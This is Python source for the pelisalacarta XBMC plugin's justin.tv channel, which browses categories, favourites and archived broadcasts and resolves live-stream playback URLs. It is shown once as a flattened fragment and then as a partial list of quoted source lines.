verificando archivos"+",5000,"+jtv_icon+")") item.url = tecleado item.action = 'getplayByID' itemlist = listarchives(item) if itemlist is not None and len(itemlist)>0: return itemlist else: channelANDarchivesEmpty() else: channelEmpty() return def teclado(default="", heading="", hidden=False): tecleado = "" keyboard = xbmc.Keyboard(default,heading,hidden) keyboard.doModal() if (keyboard.isConfirmed()): tecleado = keyboard.getText() if len(tecleado)<=0: return "" return tecleado def subCategories(item): logger.info("[justin.tv.py] subCategories") category = item.url url = URL_SUBCATEGORY_MENU %(language_menu,category,language_menu) data = scrapertools.cache_page(url) logger.info(data) itemlist = [] patron = '<li class="subcategory"><a href="/directory/'+category+'/([^\?]+)\?.+?">(.+?)</a></li>' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) scrapedthumbnail = "" scrapedplot = item.title itemlist.append( Item(channel=item.channel , action="listchannel" , title=config.get_localized_string(30421) , url="all" , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart )) for match in matches: scrapedurl = match[0] scrapedtitle =match[1] if (DEBUG): logger.info("title=["+scrapedtitle+"], url=["+scrapedurl+"], thumbnail=["+scrapedthumbnail+"]") # Añade al listado de XBMC itemlist.append( Item(channel=item.channel , action="listchannel" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart )) return itemlist def favorites(item): if item.url == '': username = config.get_setting("justin_login") else: username = item.url if username == "": LoginEmpty() config.open_settings() item.url = config.get_setting("justin_login") if item.url == '':return favorites(item) return item.title = "favorites" if config.get_setting('streamlive')=='true': livetrue='&live=true' else: livetrue = '' item.url = 
'http://api.justin.tv/api/user/favorites/'+str(username)+'.json?offset=0&limit='+str(limit)+livetrue itemlist = getlistchannel(item) if not livetrue: return itemlist xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') return def addToFavorites(item): ''' Poner aqui el proceso para añadir un canal en favoritos/follows de una cuenta en Justin.tv''' pass def removeFromFavorites(item): ''' Poner aqui el proceso para eliminar un canal de favoritos/follows de una cuenta en Justin.tv''' pass def listchannel(item): if not "|Next Page >>" in item.title: try: lang = config.get_setting("justin_lang") if len(lang) == 0: lang = 'all' except: lang = "all" item.title = item.url if lang == 'all': lang = '' else: lang = '&language='+lang if 'all' in item.url: item.url = "http://api.justin.tv/api/stream/list.json?category=%s%s&offset=0&limit=%d" %(item.category,lang,limit) else: item.url = "http://api.justin.tv/api/stream/list.json?subcategory=%s%s&offset=0&limit=%d" %(item.title,lang,limit) itemlist = getlistchannel(item) if config.get_setting('streamlive')=='true': xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') return else: return itemlist def getlistchannel(item): logger.info("[justintv.py] getlistchannel") url = item.url title = item.title if "|Next Page >>" in item.title: item.title = item.title.split('|')[0] if item.title == 'favorites': context = '|9' # Eliminar un canal de favoritos, en el listado de favoritos solo remover else: context = '|8' # Añade un canal a favoritos, en los demas listados solo añadir data = scrapertools.cache_page(url) logger.info(data) datadict = json.loads(data) totalItems = len(datadict) itemlist = [] #print item.action c = 0 try: datadict = sorted(datadict, key=lambda k: k['video_bitrate'],reverse=True) except: pass for match in datadict: try: name = match['name'].split('user_')[-1] except: try: name = match['channel']['login'] if name is None or name =='': raise except: name = match['login'] try: title = 
match['channel']['title'] if title is None or title == '': raise except: try: title = match['title'] if title is None: title = '' except: title = '' try: title = title if title is None or title == '': raise except: title = name try: tags = scrapertools.unescape(match['channel']['tags']) if tags is None or tags == '': raise except: try: tags = scrapertools.unescape(match['tags']).strip() if tags is None or tags == '': raise except: tags = '' try: status = scrapertools.unescape(match['channel']['status']).strip() if status is None or status == '': raise except: try: status = scrapertools.unescape(match['status']).strip() if status is None or status == '': raise except: status = '' try: subcat = match['channel']['category_title'] if subcat is None or subcat == '': raise except: try: subcat = match['category'] if subcat is None: raise except: subcat = '' try: views = match['channel']['views_count'] except: try: views = match['channel_view_count'] except: views = '' try: bitrate = str(match['video_bitrate']).split('.')[0] except: bitrate = '' try: lang = match['language'] except: lang = '' try: scrapedthumbnail = match['channel']['screen_cap_url_medium'] except: scrapedthumbnail = match['screen_cap_url_medium'] try: fanart_thumb = match['channel']['image_url_huge'] except: try: fanart_thumb = match['image_url_huge'] except: fanart_thumb = fanart scrapedurl = name idx = abbrev.index(lang) lang = languages[idx].decode('utf-8') scrapedplot = title +'\nStatus: '+status+'\nTags: '+tags+ '\nChannel Name: '+name+'\nBitrate: '+bitrate+'\nLanguage: '+lang+'\nViews: '+views if config.get_setting("streamlive") == "true": scrapedtitle =title + ' [%s] BitRate: %s (%s)' %(name,bitrate,lang) itemlist.append( Item(channel = item.channel, action = "playVideo" , title = scrapedtitle.encode("utf-8") , url = scrapedurl , thumbnail = scrapedthumbnail, plot = scrapedplot.encode("utf-8"), category = item.plot, totalItems= totalItems, fanart = scrapedthumbnail, context = '7', # 7 Lista videos 
archivados folder = False )) else: scrapedtitle =title + ' [%s] (%s)' %(name,lang) itemlist.append( Item(channel = item.channel , action = "listarchives" , title = scrapedtitle.encode("utf-8") , url = scrapedurl , thumbnail = scrapedthumbnail, plot = scrapedplot.encode("utf-8"), category = item.plot, totalItems = totalItems, fanart = fanart_thumb, extra = fanart_thumb, context = '6', # 6 ver canal en vivo folder = True )) if (DEBUG): logger.info("title=["+scrapedtitle+"], url=["+scrapedurl+"], thumbnail=["+scrapedthumbnail+"]") if totalItems >=limit: offset1 = re.compile('offset=(.+?)&').findall(url)[0] offset2 = str(int(offset1)+limit+1) scrapedurl = item.url.replace("offset="+offset1,"offset="+offset2) scrapedtitle = item.title+"|Next Page >>" scrapedthumbnail = '' scrapedplot = '' itemlist.append( Item(channel=item.channel , action="listchannel" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, fanart=fanart )) return itemlist def listarchives(item): logger.info("[justin.tv.py] listarchives") if "Next Page >>" in item.title: url = item.url else: url = 'http://api.justin.tv/api/channel/archives/'+item.url+'.json?offset=0&limit='+str(limit) try: data = scrapertools.cache_page(url) if len(data)==0:raise except: if item.action == 'getplayByID': return archivesempty() return logger.info(data) datadict = json.loads(data) totalItems = len(datadict) itemlist = [] for match in datadict: try: video_url = match['video_file_url'] except:continue try: broadcast_part = match['broadcast_part'] except: broadvast_part = '' try: start_time = match['start_time'] except: start_time = '' try: thumbnail = match['image_url_medium'] except: thumbnail = '' try: duration = match['length'] except: duration = '' #print 'duration: '+duration try: title = match['title'] except: title = '' scrapedtitle = title + " Part: (%s) Start time: %s" %(broadcast_part,start_time) itemlist.append( Item(channel=item.channel , action="play" , 
server = 'Directo', title=scrapedtitle.encode("utf-8") , url=video_url , thumbnail=thumbnail, plot=item.url,category = item.category,duration=duration, totalItems=totalItems,fanart = item.extra,context='6', folder=False )) if totalItems >=limit: offset1 = re.compile('offset=(.+?)&').findall(url)[0] offset2 = str(int(offset1)+limit+1) scrapedurl = url.replace("offset="+offset1,"offset="+offset2) scrapedtitle = "Next Page >>" scrapedthumbnail = '' scrapedplot = '' itemlist.append( Item(channel=item.channel , action="listarchives" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, extra=item.extra )) return itemlist def playVideo(item): logger.info("[justin.tv.py] playVideo") channelname=item.url if channelname.endswith('.flv'): channelname = item.plot rtmp = "" try: if config.get_setting('realdebridpremium')=="true": from servers import realdebrid url = "http://justin.tv/"+channelname rtmp = realdebrid.get_video_url( page_url=url , premium=(config.get_setting("realdebridpremium")=="true") , user=config.get_setting("realdebriduser") , password=config.get_setting("realdebridpassword"), video_password="" ) logger.info('rtmp = %s'%rtmp) except:pass if rtmp.startswith('rtmp'): listItem = xbmcgui.ListItem(path = rtmp) listItem.setProperty('IsPlayable', 'true') xbmcplugin.setResolvedUrl(pluginhandle, True, listItem) else: req = urllib2.Request('http://justin.tv/') response = urllib2.urlopen(req) link=response.read() response.close() match = re.compile('swfobject.embedSWF\("(.+?)"').findall(link) swf = ' swfUrl='+str(match[0]) req = urllib2.Request('http://usher.justin.tv/find/'+channelname+'.json?type=live') req.addheaders = ('Referer', 'http://justin.tv/') response = urllib2.urlopen(req) link=response.read() response.close() logger.info(link) datadict = json.loads(link) try: token = ' jtv='+datadict[0]["token"].replace('\\','\\5c').replace('"','\\22').replace(' ','\\20') connect = 
datadict[0]["connect"]+'/'+datadict[0]["play"] Pageurl = ' Pageurl=http://www.justin.tv/'+channelname rtmp = connect+token+swf+Pageurl logger.info('rtmp = %s'%rtmp) listItem = xbmcgui.ListItem(path = rtmp) listItem.setProperty('IsPlayable', 'true') xbmcplugin.setResolvedUrl(pluginhandle, True, listItem) except: logger.info('canal %s esta offline'%channelname) xbmcplugin.setResolvedUrl(pluginhandle, False, xbmcgui.ListItem()) channeloffline(channelname) def _language(item): _language_(item) return def _language_(item): lang = config.get_setting('justin_lang') if "," in lang: lang = lang.split(",") elif lang == "": lang = ["all"] else: lang = [lang] lenguajes = languages squareRoot=scrapertools.unescape("&#8730;") for i in lang: if i == 'all': idx = abbrev.index(i) lenguajes[idx]=lenguajes[idx]+" "+squareRoot break idx = abbrev.index(i) lenguajes[idx]=lenguajes[idx]+" "+squareRoot dia = xbmcgui.Dialog() seleccion = dia.select("Choice a language", lenguajes) if seleccion == -1:return abb = languages[seleccion] logger.info("seleccion : %s %s" %(seleccion,abb)) lang = '' for count,i in enumerate(lenguajes): if seleccion == 0: lang = 'all' break if squareRoot in i: if count == seleccion:continue if abbrev[count]=='all':continue if len(lang)>0: lang = lang + "," + abbrev[count] else: lang = abbrev[count] if count == seleccion: if len(lang)>0: lang = lang + "," + abbrev[count] else: lang = abbrev[count] config.set_setting('justin_lang',lang) logger.info("lenguajes configurados: "+lang) xbmc.executebuiltin( "Container.Refresh" ) return def channelEmpty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ," "*18+config.get_localized_string(30411)) def LoginEmpty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ," "*18+config.get_localized_string(30422)) def channeloffline(channelname): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ,config.get_localized_string(30423)%channelname) def archivesempty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin 
TV" ," "*18+config.get_localized_string(30412)) def channelANDarchivesEmpty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ," "*18+config.get_localized_string(30411)," "*18+config.get_localized_string(30412))
[ "# -*- coding: utf-8 -*-\n", "#------------------------------------------------------------\n", "# pelisalacarta - XBMC Plugin\n", "# Canal para justin.tv by Bandavi\n", "# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/\n", "#------------------------------------------------------------\n", "import urlparse,urllib2,urllib,re\n", "import os, sys\n", "import xbmc,xbmcgui,xbmcplugin\n", "\n", "from core import logger\n", "from core import config\n", "from core import scrapertools\n", "from core.item import Item\n", "from servers import servertools\n", "from platformcode.xbmc import xbmctools\n", "try:\n", " import json\n", "except:\n", " import simplejson as json\n", "\n", "__channel__ = \"justintv\"\n", "__category__ = \"G\"\n", "__type__ = \"generic\"\n", "__title__ = \"Justin.tv\"\n", "__language__ = \"\"\n", "__creationdate__ = \"20111128\"\n", "\n", "DEBUG = config.get_setting(\"debug\")\n", "pluginhandle = int(sys.argv[1])\n", "\n", "IMAGES_PATH = xbmc.translatePath( os.path.join( config.get_runtime_path(), 'resources' , 'images' , 'posters' ) )\n", "fanart = xbmc.translatePath(os.path.join( config.get_runtime_path(), 'resources' , 'images' ,'fanart','justintv.png'))\n", "if config.get_setting(\"thumbnail_type\")==\"0\":\r\n", " WEB_PATH = \"http://pelisalacarta.mimediacenter.info/posters/\"\r\n", "else:\r\n", " WEB_PATH = \"http://pelisalacarta.mimediacenter.info/banners/\"\r\n", "\r\n", "jtv_icon = WEB_PATH+\"justintv.png\"\r\n", "\n", "all = config.get_localized_string(30419)\n", "\n", "languages = [all,'Arabic','Català','Cerky','Dansk','Deutsch','Greek','English','Español','Eusti Keel','suomi','Francais',\n", " 'Hindi' ,'Hrvatski','bahasa Indonesia','Italiano','Hebrew','Japanese','Korean','Lietuviu','Nederlands',\n", " 'Norsk','Polski','Portugues','Romana','Russian','Serbian','Svenska','Talagog','Turkey','Tieng Viet',\n", " 'Chinese','Taiwanese']\n", "abbrev = 
['all','ar','ca','cs','da','de','el','en','es','et','fi','fr','hi','hr','id','it','iw','ja','ko','lt','nl','no','pl','pt',\n", " 'ro','ru','sr','sv','tl','tr','vi','zh-CN','zh-TW']\n", "limit = 50\n", "URL_CATEGORY_MENU = 'http://%s.justin.tv/directory/dropmenu/category?lang=%s&amp;order=hot'\n", "URL_SUBCATEGORY_MENU = 'http://%s.justin.tv/directory/dropmenu/subcategory/%s?order=hot&amp;lang=%s'\n", "MenuLang = {'English':'en','Spanish':'es','Italian':'it','Catalan':'ca','French':'fr','Portuguese':'pt','German':'de'}\n", "try:\n", " language_menu = MenuLang[xbmc.getLanguage()]\n", "except:\n", " language_menu = 'en'\n", "\n", "def isGeneric():\n", " return True\n", "\n", "def mainlist(item):\n", " logger.info(\"[justintv.py] mainlist\")\n", "\n", " itemlist = []\n", " try:\n", " lang = config.get_setting('justin_lang')\n", " if \",\" in lang:\n", " langs = lang.split(\",\")\n", " lang = ''\n", " for i in langs:\n", " idx = abbrev.index(i)\n", " if len(lang)>0:\n", " lang = lang + \",\" + languages[idx]\n", " else:\n", " lang = languages[idx]\n", " \n", " else:\n", " idx = abbrev.index(lang)\n", " lang = languages[idx]\n", " except:\n", " lang = 'all'\n", " idx = abbrev.index(lang)\n", " lang = languages[idx]\n", " \n", "\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30420) + ' (%s)' %lang, action=\"_language\" ,url = \"\", thumbnail =WEB_PATH+ \"language.jpg\",fanart = fanart, folder = False))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30414), action=\"listcategory\" ,url = \"true\", thumbnail='http://www-cdn.jtvnw.net/images/redesign/fp_vector_camera.png',fanart = fanart))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30413), action=\"listcategory\" ,url = \"false\", thumbnail='',fanart = fanart))\n", " return itemlist\n", "\n", "def listcategory(item):\n", " itemlist = []\n", " config.set_setting(\"streamlive\",item.url)\n", " listcat = 
getlistcategory()\n", " if item.url=='false':\n", " title = config.get_localized_string(30408)\n", " else:\n", " title = ''\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30416)+title, action=\"favorites\" ,url = \"\", thumbnail=WEB_PATH+ \"favoritos.png\",fanart = fanart))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30415), action=\"getplayByID\" ,url = \"\", thumbnail=\"http://thecustomizewindows.com/wp-content/uploads/2011/12/Best-Keyboard-Apps.png\",fanart = fanart))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30417), action=\"search\" ,url = \"\", thumbnail=WEB_PATH+\"buscador.png\",fanart = fanart))\n", " for category in listcat:\n", " itemlist.append( Item(channel=__channel__, title=scrapertools.unescape(category[1]), action=\"subCategories\" ,url = category[0], thumbnail=\"http://www-cdn.jtvnw.net/images/category_icons/%s.png\" %category[0],fanart = fanart))\n", "\n", " return itemlist\n", " \n", "def getlistcategory():\n", " data = scrapertools.cache_page(URL_CATEGORY_MENU %(language_menu,language_menu))\n", " patron = '<li class=\"category\"><a href=\"/directory/([^\\?]+)\\?.+?\">(.+?)</a></li>'\n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " list = []\n", " for match in matches:\n", " list.append([match[0],match[1]])\n", " return list\n", "\n", "def search(item,texto):\n", " \n", " texto = texto.replace(' ','+')\n", " item.title = 'search'\n", " item.url = url = 'http://api.justin.tv/api/stream/search/'+texto+'.json?offset=0&limit='+str(limit)\n", " itemlist = getlistchannel(item)\n", " if config.get_setting('streamlive')=='true':\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " else:\n", " return itemlist\n", "\n", " \n", "def getplayByID(item):\n", " logger.info(\"[justintv.py] plyByID\")\n", " tecleado = \"\"\n", " default = \"\"\n", " itemlist = 
[]\n", " tecleado = teclado(heading=config.get_localized_string(30405))\n", " if len(tecleado)>0:\n", " item.url = 'http://api.justin.tv/api/stream/list.json?channel='+tecleado\n", " itemlist = getlistchannel(item)\n", " if len(itemlist)>0:\n", " if config.get_setting('streamlive') == 'true':\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " else:\n", " return itemlist\n", " elif config.get_setting('streamlive') != 'true':\r\n", " xbmc.executebuiltin(\"XBMC.Notification(Justin tv,Streaming no encontrado... verificando archivos\"+\",5000,\"+jtv_icon+\")\")\r\n", " item.url = tecleado\r\n", " item.action = 'getplayByID'\r\n", " itemlist = listarchives(item)\r\n", " if itemlist is not None and len(itemlist)>0:\r\n", " return itemlist\r\n", " else:\r\n", " channelANDarchivesEmpty()\n", " else:\r\n", " channelEmpty()\n", " return\n", "\n", "def teclado(default=\"\", heading=\"\", hidden=False):\n", " tecleado = \"\"\n", " keyboard = xbmc.Keyboard(default,heading,hidden)\n", " keyboard.doModal()\n", " if (keyboard.isConfirmed()):\n", " tecleado = keyboard.getText()\n", " if len(tecleado)<=0:\n", " return \"\"\n", " return tecleado\n", " \n", "def subCategories(item):\n", " logger.info(\"[justin.tv.py] subCategories\")\n", "\n", " category = item.url\n", " \n", " url = URL_SUBCATEGORY_MENU %(language_menu,category,language_menu)\n", " data = scrapertools.cache_page(url)\n", " logger.info(data)\n", " itemlist = []\n", " patron = '<li class=\"subcategory\"><a href=\"/directory/'+category+'/([^\\?]+)\\?.+?\">(.+?)</a></li>'\n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " scrapedthumbnail = \"\"\n", " scrapedplot = item.title\n", " itemlist.append( Item(channel=item.channel , action=\"listchannel\" , title=config.get_localized_string(30421) , url=\"all\" , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart ))\n", " for match in matches:\n", " scrapedurl = 
match[0]\n", " scrapedtitle =match[1]\n", "\n", " if (DEBUG): logger.info(\"title=[\"+scrapedtitle+\"], url=[\"+scrapedurl+\"], thumbnail=[\"+scrapedthumbnail+\"]\")\n", "\n", " # Añade al listado de XBMC\n", " itemlist.append( Item(channel=item.channel , action=\"listchannel\" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart ))\n", " \n", " return itemlist\n", "\n", "def favorites(item):\n", " if item.url == '':\n", " username = config.get_setting(\"justin_login\")\n", " else:\n", " username = item.url\n", " if username == \"\":\n", " LoginEmpty()\n", " config.open_settings()\n", " item.url = config.get_setting(\"justin_login\")\n", " if item.url == '':return\n", " favorites(item)\n", " return \n", " item.title = \"favorites\"\n", " if config.get_setting('streamlive')=='true':\n", " livetrue='&live=true'\n", " else:\n", " livetrue = ''\n", " item.url = 'http://api.justin.tv/api/user/favorites/'+str(username)+'.json?offset=0&limit='+str(limit)+livetrue\r\n", " itemlist = getlistchannel(item)\r\n", " if not livetrue:\r\n", " return itemlist\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " return \n", "\r\n", "def addToFavorites(item):\r\n", " ''' Poner aqui el proceso para añadir un canal en favoritos/follows de una cuenta en Justin.tv'''\r\n", " pass\r\n", "\r\n", "def removeFromFavorites(item):\r\n", " ''' Poner aqui el proceso para eliminar un canal de favoritos/follows de una cuenta en Justin.tv'''\r\n", " pass\r\n", "\n", "def listchannel(item):\n", " \n", " if not \"|Next Page >>\" in item.title:\n", " try:\n", " lang = config.get_setting(\"justin_lang\")\n", " if len(lang) == 0:\n", " lang = 'all'\n", " except:\n", " lang = \"all\"\n", " item.title = item.url\n", " if lang == 'all':\n", " lang = ''\n", " else:\n", " lang = '&language='+lang\n", " if 'all' in item.url:\n", " item.url = \"http://api.justin.tv/api/stream/list.json?category=%s%s&offset=0&limit=%d\" 
%(item.category,lang,limit)\n", " else:\n", " item.url = \"http://api.justin.tv/api/stream/list.json?subcategory=%s%s&offset=0&limit=%d\" %(item.title,lang,limit)\n", " itemlist = getlistchannel(item)\r\n", " if config.get_setting('streamlive')=='true':\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " return \r\n", " else:\r\n", " return itemlist\n", "\n", "def getlistchannel(item):\n", " logger.info(\"[justintv.py] getlistchannel\")\n", " \n", " url = item.url\n", " title = item.title\n", " if \"|Next Page >>\" in item.title:\n", " item.title = item.title.split('|')[0]\r\n", " if item.title == 'favorites':\r\n", " context = '|9' # Eliminar un canal de favoritos, en el listado de favoritos solo remover\r\n", " else:\r\n", " context = '|8' # Añade un canal a favoritos, en los demas listados solo añadir\n", " data = scrapertools.cache_page(url)\n", " logger.info(data)\n", " datadict = json.loads(data)\n", " totalItems = len(datadict)\n", " itemlist = []\n", " #print item.action\n", " c = 0\n", " try:\n", " datadict = sorted(datadict, key=lambda k: k['video_bitrate'],reverse=True)\n", " except:\n", " pass\n", " for match in datadict:\n", " try:\n", " name = match['name'].split('user_')[-1]\n", " except:\n", " try:\n", " name = match['channel']['login']\n", " if name is None or name =='':\n", " raise\n", " except:\n", " name = match['login']\n", " try:\n", " title = match['channel']['title']\n", " if title is None or title == '':\n", " raise\n", " except:\n", " try:\n", " title = match['title']\n", " if title is None:\n", " title = ''\n", " except:\n", " title = ''\n", " try:\n", " title = title\n", " if title is None or title == '':\n", " raise\n", " except:\n", " title = name\n", " \n", " try:\n", " tags = scrapertools.unescape(match['channel']['tags'])\n", " if tags is None or tags == '':\n", " raise\n", " except:\n", " try:\n", " tags = scrapertools.unescape(match['tags']).strip()\n", " if tags is None or tags == '':\n", " raise\n", " 
except:\r\n", " tags = ''\n", " try:\n", " status = scrapertools.unescape(match['channel']['status']).strip()\n", " if status is None or status == '':\n", " raise\n", " except:\n", " try:\n", " status = scrapertools.unescape(match['status']).strip()\n", " if status is None or status == '':\n", " raise\n", " except:\n", " status = ''\n", " try:\n", " subcat = match['channel']['category_title']\n", " if subcat is None or subcat == '':\n", " raise\n", " except:\n", " try:\n", " subcat = match['category']\n", " if subcat is None:\n", " raise\n", " except:\n", " subcat = ''\n", " try:\n", " views = match['channel']['views_count']\n", " except:\n", " try:\n", " views = match['channel_view_count']\n", " except:\n", " views = ''\n", " \n", " try:\n", " bitrate = str(match['video_bitrate']).split('.')[0]\n", " except:\n", " bitrate = ''\n", " try:\n", " lang = match['language']\n", " except:\n", " lang = ''\n", " try:\n", " scrapedthumbnail = match['channel']['screen_cap_url_medium']\n", " \n", " except:\n", " scrapedthumbnail = match['screen_cap_url_medium']\n", " try:\n", " fanart_thumb = match['channel']['image_url_huge']\n", " except:\n", " try:\n", " fanart_thumb = match['image_url_huge']\n", " except:\n", " fanart_thumb = fanart\n", " scrapedurl = name\n", " \n", " idx = abbrev.index(lang)\n", " lang = languages[idx].decode('utf-8')\n", " scrapedplot = title +'\\nStatus: '+status+'\\nTags: '+tags+ '\\nChannel Name: '+name+'\\nBitrate: '+bitrate+'\\nLanguage: '+lang+'\\nViews: '+views\n", "\n", " if config.get_setting(\"streamlive\") == \"true\":\n", " scrapedtitle =title + ' [%s] BitRate: %s (%s)' %(name,bitrate,lang)\n", " itemlist.append( Item(channel = item.channel,\r\n", " action = \"playVideo\" ,\r\n", " title = scrapedtitle.encode(\"utf-8\") ,\r\n", " url = scrapedurl , \r\n", " thumbnail = scrapedthumbnail, \r\n", " plot = scrapedplot.encode(\"utf-8\"),\r\n", " category = item.plot, \r\n", " totalItems= totalItems,\r\n", " fanart = scrapedthumbnail, \r\n", " 
context = '7', # 7 Lista videos archivados \r\n", " folder = False \r\n", " ))\n", " else:\n", " scrapedtitle =title + ' [%s] (%s)' %(name,lang)\n", " itemlist.append( Item(channel = item.channel , \r\n", " action = \"listarchives\" , \r\n", " title = scrapedtitle.encode(\"utf-8\") , \r\n", " url = scrapedurl , \r\n", " thumbnail = scrapedthumbnail, \r\n", " plot = scrapedplot.encode(\"utf-8\"),\r\n", " category = item.plot, \r\n", " totalItems = totalItems,\r\n", " fanart = fanart_thumb, \r\n", " extra = fanart_thumb, \r\n", " context = '6', # 6 ver canal en vivo \r\n", " folder = True \r\n", " ))\n", " if (DEBUG): logger.info(\"title=[\"+scrapedtitle+\"], url=[\"+scrapedurl+\"], thumbnail=[\"+scrapedthumbnail+\"]\")\n", "\n", " if totalItems >=limit:\n", " offset1 = re.compile('offset=(.+?)&').findall(url)[0]\n", " offset2 = str(int(offset1)+limit+1)\n", " scrapedurl = item.url.replace(\"offset=\"+offset1,\"offset=\"+offset2)\n", " scrapedtitle = item.title+\"|Next Page >>\"\n", " scrapedthumbnail = ''\n", " scrapedplot = ''\n", " itemlist.append( Item(channel=item.channel , action=\"listchannel\" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, fanart=fanart ))\n", " return itemlist\n", "\n", "def listarchives(item):\n", " logger.info(\"[justin.tv.py] listarchives\")\n", " if \"Next Page >>\" in item.title:\n", " url = item.url\n", " else:\n", " url = 'http://api.justin.tv/api/channel/archives/'+item.url+'.json?offset=0&limit='+str(limit)\n", " try:\n", " data = scrapertools.cache_page(url)\r\n", " if len(data)==0:raise\n", " except:\r\n", " if item.action == 'getplayByID':\r\n", " return\n", " archivesempty()\n", " return\n", " logger.info(data)\n", " datadict = json.loads(data)\n", " totalItems = len(datadict)\n", " itemlist = []\n", "\n", " for match in datadict:\r\n", " try:\n", " video_url = match['video_file_url']\r\n", " except:continue\r\n", " try:\n", " broadcast_part = 
match['broadcast_part']\r\n", " except:\r\n", " broadvast_part = ''\r\n", " try:\n", " start_time = match['start_time']\r\n", " except:\r\n", " start_time = ''\r\n", " try:\r\n", " thumbnail = match['image_url_medium']\r\n", " except:\r\n", " thumbnail = ''\r\n", " try:\n", " duration = match['length']\r\n", " except:\r\n", " duration = ''\n", " #print 'duration: '+duration\n", " try:\n", " title = match['title']\n", " except:\n", " title = ''\n", " scrapedtitle = title + \" Part: (%s) Start time: %s\" %(broadcast_part,start_time)\n", " itemlist.append( Item(channel=item.channel , action=\"play\" , server = 'Directo', title=scrapedtitle.encode(\"utf-8\") , url=video_url , thumbnail=thumbnail, plot=item.url,category = item.category,duration=duration, totalItems=totalItems,fanart = item.extra,context='6', folder=False ))\n", "\n", " if totalItems >=limit:\n", " offset1 = re.compile('offset=(.+?)&').findall(url)[0]\n", " offset2 = str(int(offset1)+limit+1)\n", " scrapedurl = url.replace(\"offset=\"+offset1,\"offset=\"+offset2)\n", " scrapedtitle = \"Next Page >>\"\n", " scrapedthumbnail = ''\n", " scrapedplot = ''\n", " itemlist.append( Item(channel=item.channel , action=\"listarchives\" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, extra=item.extra ))\n", " \n", " return itemlist\n", " \n", "def playVideo(item):\n", " logger.info(\"[justin.tv.py] playVideo\")\n", "\n", " channelname=item.url\n", " if channelname.endswith('.flv'):\n", " channelname = item.plot\r\n", " rtmp = \"\"\r\n", " try:\r\n", " if config.get_setting('realdebridpremium')==\"true\":\r\n", " from servers import realdebrid\r\n", " url = \"http://justin.tv/\"+channelname\r\n", " rtmp = realdebrid.get_video_url( page_url=url , premium=(config.get_setting(\"realdebridpremium\")==\"true\") , user=config.get_setting(\"realdebriduser\") , password=config.get_setting(\"realdebridpassword\"), video_password=\"\" )\n", " logger.info('rtmp = 
%s'%rtmp)\r\n", " except:pass\r\n", " \r\n", " if rtmp.startswith('rtmp'):\r\n", " listItem = xbmcgui.ListItem(path = rtmp)\r\n", " listItem.setProperty('IsPlayable', 'true')\r\n", " xbmcplugin.setResolvedUrl(pluginhandle, True, listItem)\r\n", " else:\r\n", " req = urllib2.Request('http://justin.tv/')\n", " response = urllib2.urlopen(req)\n", " link=response.read()\n", " response.close()\n", " match = re.compile('swfobject.embedSWF\\(\"(.+?)\"').findall(link)\n", " swf = ' swfUrl='+str(match[0])\n", " req = urllib2.Request('http://usher.justin.tv/find/'+channelname+'.json?type=live')\n", " req.addheaders = ('Referer', 'http://justin.tv/')\n", " response = urllib2.urlopen(req)\n", " link=response.read()\n", " response.close()\n", " logger.info(link)\n", " datadict = json.loads(link)\n", " try:\n", " token = ' jtv='+datadict[0][\"token\"].replace('\\\\','\\\\5c').replace('\"','\\\\22').replace(' ','\\\\20')\n", " connect = datadict[0][\"connect\"]+'/'+datadict[0][\"play\"]\n", " Pageurl = ' Pageurl=http://www.justin.tv/'+channelname\n", " rtmp = connect+token+swf+Pageurl\n", " logger.info('rtmp = %s'%rtmp)\n", " listItem = xbmcgui.ListItem(path = rtmp)\n", " listItem.setProperty('IsPlayable', 'true')\n", " xbmcplugin.setResolvedUrl(pluginhandle, True, listItem)\n", " except:\n", " logger.info('canal %s esta offline'%channelname)\n", " xbmcplugin.setResolvedUrl(pluginhandle, False, xbmcgui.ListItem())\n", " channeloffline(channelname)\n", "\n", "def _language(item):\n", " _language_(item)\r\n", " return\r\n", "\r\n", "def _language_(item):\r\n", " lang = config.get_setting('justin_lang')\n", " if \",\" in lang:\n", " lang = lang.split(\",\")\n", " elif lang == \"\":\r\n", " lang = [\"all\"]\r\n", " else:\n", " lang = [lang]\n", " lenguajes = languages\n", " squareRoot=scrapertools.unescape(\"&#8730;\")\n", " for i in lang:\n", " if i == 'all':\n", " idx = abbrev.index(i)\n", " lenguajes[idx]=lenguajes[idx]+\" \"+squareRoot\n", " break\n", " idx = abbrev.index(i)\n", 
